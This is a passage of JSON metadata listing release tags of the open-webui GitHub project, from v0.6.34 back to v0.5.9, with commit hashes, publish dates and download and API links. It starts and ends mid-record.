"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.34","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.34/manifests"},{"name":"v0.6.33","sha":"8d7d79d54b9160425fc5050b3484bec40dd3b44e","kind":"commit","published_at":"2025-10-07T21:20:27.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.33","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.33/manifests"},{"name":"v0.6.32","sha":"37d1c85c996e1bdcd505e1e6d62b2f17acd8df23","kind":"commit","published_at":"2025-09-29T06:13:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.32","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.32/manifests"},{"name":"v0.6.31","sha":"598282cf75de358215d045c617e70d28bc48929e","kind":"commit","published_at":"2025-09-25T20:28:06.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.31","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.31/manifests"},{"name":"v0.6.30","sha":"8920bf23774edd829e54e65b043864afb97bf2cf","kind":"commit","published_at":"2025-09-17T17:25:26.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.30","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.30/manifests"},{"name":"v0.6.29","sha":"dddd1e44f37e0b489d10abbc21667e16d62722f6","kind":"commit","published_at":"2025-09-17T16:32:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.29","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.29/manifests"},{"name":"v0.6.28","sha":"171021cfa4276f63fd9fd7f31fa0c904fb13c24c","kind":"commit","published_at":"2025-09-10T10:53:30.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.28","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.28/manifests"},{"name":"v0.6.27","sha":"918f507d8cdc652ae913b8596877a8a50b845114","kind":"commit","published_at":"2025-09-09T14:34:15.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.27","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.27/manifests"},{"name":"v0.6.26","sha":"2407d9b905978d68619bdce4021e424046ec8df9","kind":"commit","published_at":"2025-08-28T10:40:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.26","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.26/manifests"},{"name":"v0.6.25","sha":"1db8dec4f52fc0fa8f8f7bfbb8ea5bde41fee17d","kind":"commit","published_at":"2025-08-22T13:22:31.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.25","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.25/manifests"},{"name":"v0.6.24","sha":"2777bab1485aad097aa41c44a76f49be141eb061","kind":"commit","published_at":"2025-08-22T10:06:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.24","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.24/manifests"},{"name":"v0.6.23","sha":"407dc9a401fc2382df06d776dbd8ba95dffda38a","kind":"commit","published_at":"2025-08-21T18:21:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.23","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.23/manifests"},{"name":"v0.6.22","sha":"438e5d966f0f64f9ea3feab22724a5bd96a4127b","kind":"commit","published_at":"2025-08-11T13:15:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.22","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.22/manifests"},{"name":"v0.6.21","sha":"30d0f8b1f6cc45ac3ee7e05ccb5c849366680231","kind":"commit","published_at":"2025-08-10T13:39:57.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.21","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.21/manifests"},{"name":"v0.6.20","sha":"3f35ba27fc31500e2b1085f067371541becd5165","kind":"commit","published_at":"2025-08-09T22:59:14.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.20/manifests"},{"name":"v0.6.19","sha":"2c3655a9694fc3f9a428e5521f42a187901d8dc0","kind":"commit","published_at":"2025-08-09T22:38:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.19/manifests"},{"name":"v0.6.18","sha":"5fbfe2bdcadf5f157926f6551891e4dc0802b9f3","kind":"commit","published_at":"2025-07-19T19:26:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.18/manifests"},{"name":"v0.6.17","sha":"b249809d2dff7bc89394a61ee5f7e258b295623a","kind":"commit","published_at":"2025-07-19T17:39:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.17/manifests"},{"name":"v0.6.16","sha":"f966935d1da56a1f9f8691c1f62d68eecc0438fa","kind":"commit","published_at":"2025-07-14T17:39:26.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.16/manifests"},{"name":"v0.6.15","sha":"b5f4c85bb196c16a775802907aedd87366f58b0f","kind":"commit","published_at":"2025-06-16T14:34:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.15/manifests"},{"name":"v0.6.14","sha":"63256136ef8322210c01c2bb322097d1ccfb8c6f","kind":"commit","published_at":"2025-06-10T14:17:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.14/manifests"},{"name":"v0.6.13","sha":"53764fe64884da147359e54ed6d9607fe57f1600","kind":"commit","published_at":"2025-05-29T21:37:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.13/manifests"},{"name":"v0.6.12","sha":"ba0088f39b7a093920b142a5172554686f24df60","kind":"commit","published_at":"2025-05-28T23:59:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.12/manifests"},{"name":"v0.6.11","sha":"9faa4c6a4cd8dd643cddb93dccb65c6609488a29","kind":"commit","published_at":"2025-05-26T22:27:09.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.11/manifests"},{"name":"v0.6.10","sha":"e6afa69f59295d2930ff57285d0933e207d8e4c3","kind":"commit","published_at":"2025-05-19T01:34:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.10/manifests"},{"name":"v0.6.9","sha":"0cef844168e97b70de2abee4c076cc30ffec6193","kind":"commit","published_at":"2025-05-10T19:04:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"ef301aa16b84f9cbc0ece18539f9db80bff0f605","kind":"commit","published_at":"2025-05-10T15:31:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"a3bb7df61058e690a76cebb7681bd5390e77d226","kind":"commit","published_at":"2025-05-06T23:08:25.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"23b9354cf6575bfe82e67df0660128d5a92461fc","kind":"commit","published_at":"2025-05-05T13:58:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"07d8460126a686de9a99e2662d06106e22c3f6b6","kind":"commit","published_at":"2025-04-14T09:13:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.5/manifests"},{"name":"v0.6.4","sha":"aca37f592d0dedea2529fcb4304e4ff39e0c1219","kind":"commit","published_at":"2025-04-13T06:01:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.4/manifests"},{"name":"v0.6.3","sha":"8b0e565e2c8a8f47f54ef039eb132ddb756e83a6","kind":"commit","published_at":"2025-04-13T05:44:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.3/manifests"},{"name":"v0.6.2","sha":"63533c9e3ab41edd7bd4124ef94f6b6dc09aa175","kind":"commit","published_at":"2025-04-07T03:41:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.2/manifests"},{"name":"v0.6.1","sha":"da948351658602fb7870b3e8573ad2b6f1ace09e","kind":"commit","published_at":"2025-04-05T17:15:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.1/manifests"},{"name":"v0.6.0","sha":"04799f1f95f958674d35ba4854ef62754a4d332e","kind":"commit","published_at":"2025-04-01T01:47:18.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.0/manifests"},{"name":"v0.5.20","sha":"3b70cd64d7fa6902e8c79cf8dcbf3c7e84cf704b","kind":"commit","published_at":"2025-03-06T03:44:45.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.20/manifests"},{"name":"v0.5.19","sha":"1a51584fe02ba917e229f52367363ff783babd22","kind":"commit","published_at":"2025-03-05T06:22:20.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.19/manifests"},{"name":"v0.5.18","sha":"95cadaca72e676199caf894f40cc132d7c8416df","kind":"commit","published_at":"2025-02-27T20:00:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.18/manifests"},{"name":"v0.5.17","sha":"15485e7c5d2c09857acce10e311707e2bb8e86c9","kind":"commit","published_at":"2025-02-27T11:46:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.17/manifests"},{"name":"v0.5.16","sha":"6fedd72e3973e1d13c9daf540350cd822826bf27","kind":"commit","published_at":"2025-02-20T19:26:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.16/manifests"},{"name":"v0.5.15","sha":"9fdf2cd16c38d1711616925e852f17cac865d5fe","kind":"commit","published_at":"2025-02-20T10:01:29.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.15/manifests"},{"name":"v0.5.14","sha":"3f3a5bb0ab8ce3425f317f1e57b084523aa2b2a5","kind":"commit","published_at":"2025-02-18T05:48:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.14/manifests"},{"name":"v0.5.13","sha":"e4c9734fcba5105c30de874fd4c21c602dbd08a6","kind":"commit","published_at":"2025-02-18T04:36:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.13/manifests"},{"name":"v0.5.12","sha":"2017856791b666fac5f1c2f80a3bc7916439438b","kind":"commit","published_at":"2025-02-14T07:12:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.12/manifests"},{"name":"v0.5.11","sha":"4d667e447d0ae09e7723b979a699d0e85806552b","kind":"commit","published_at":"2025-02-13T10:06:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.11/manifests"},{"name":"v0.5.10","sha":"e9d6ada25cd6ce84be067ba794af4c9d7116edc7","kind":"commit","published_at":"2025-02-05T22:46:41.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.10/manifests"},{"name":"v0.5.9","sha":"ab94468ffa765c9ed169cff3a7caa18e85f434db","kind":"commit","published_at":"2025-02-05T10:38:21.000Z","download_url":"https://codeload